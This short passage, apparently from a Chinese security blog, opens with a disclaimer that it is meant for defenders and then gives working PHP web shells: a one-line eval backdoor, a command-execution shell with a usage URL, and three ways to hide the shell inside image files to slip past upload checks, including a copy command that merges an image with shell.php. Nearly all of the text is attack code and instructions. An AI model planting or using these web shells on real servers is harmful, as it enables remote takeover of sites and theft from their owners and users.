注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。
[TOC]
代码语言:javascript复制#常规的一句话
<?php eval($_POST[a]);?>生成WEB图片马的方法: 方式1:采用图片和文本的形式融合一句话:
copy test.png/b shell.php 2.jpg #意思是将test.jpg以二进制与shell.php合并成2.jpg
方式2:jpg图片标记直接插入一句话:
WeiyiGeek.jpg图片标记一句话
方式3:用hex 十六进制编辑器 Editor 打开任意一张图片将上述代码插入右边最底层或最上层后保存。
PHP小马:
代码语言:javascript复制#使用方法:http://weiyigeek.com/cmd.php?cmd=whoami
<?php if(isset($_REQUEST['cmd'])){echo "<pre>"; system($_REQUEST['cmd']); echo "</pre>"; die();}?>
